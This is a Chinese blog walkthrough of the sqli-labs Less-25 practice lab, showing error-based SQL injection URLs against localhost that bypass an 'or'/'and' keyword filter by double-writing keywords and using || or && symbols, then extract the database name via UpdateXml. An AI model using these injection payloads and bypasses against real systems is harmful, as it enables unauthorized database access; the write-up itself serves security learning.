码迷,mamicode.com
首页 > 数据库 > 详细

【sqli-labs】 less25 GET- Error based -All you OR&AND belong to us -string single quote(基于错误的去除了or和and的GET型单引号注入)

时间:2018-01-27 21:15:23      阅读:217      评论:0      收藏:0      [点我收藏+]

标签:oca   int   替换   string   class   cal   通过   error   屏蔽   

技术分享图片

加单引号

技术分享图片

order by一下

http://localhost/sqli-labs-master/Less-25/?id=1‘ order by 1%23

技术分享图片

order by 变成了der by

下面的hint也显示了过滤后的字符串,其实直接看报错就可以看出来了,虽然标题是屏蔽了or和and,结果order也被误伤了

由于过滤只是单纯的将or and用空串进行了替换那么构造oorrder by就应该可以通过了

http://localhost/sqli-labs-master/Less-25/?id=1‘ oorrder by 1%23

技术分享图片

union select完全没有过滤

技术分享图片

and绕过

http://localhost/sqli-labs-master/Less-25/?id=1‘ anandd UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

技术分享图片

上面的绕过方式被称为双写绕过,除此之外,还可以用符号绕过

                符号          URL编码

or              ||              %7c%7c

and           &&           %26%26(GET提交必须编码)

http://localhost/sqli-labs-master/Less-25/?id=0‘ || UpdateXml(1,concat(0x7e,database(),0x7e),1)%23
http://localhost/sqli-labs-master/Less-25/?id=1‘ %26%26 UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

 

【sqli-labs】 less25 GET- Error based -All you OR&AND belong to us -string single quote(基于错误的去除了or和and的GET型单引号注入)

标签:oca   int   替换   string   class   cal   通过   error   屏蔽   

原文地址:https://www.cnblogs.com/superkrissV/p/8367060.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!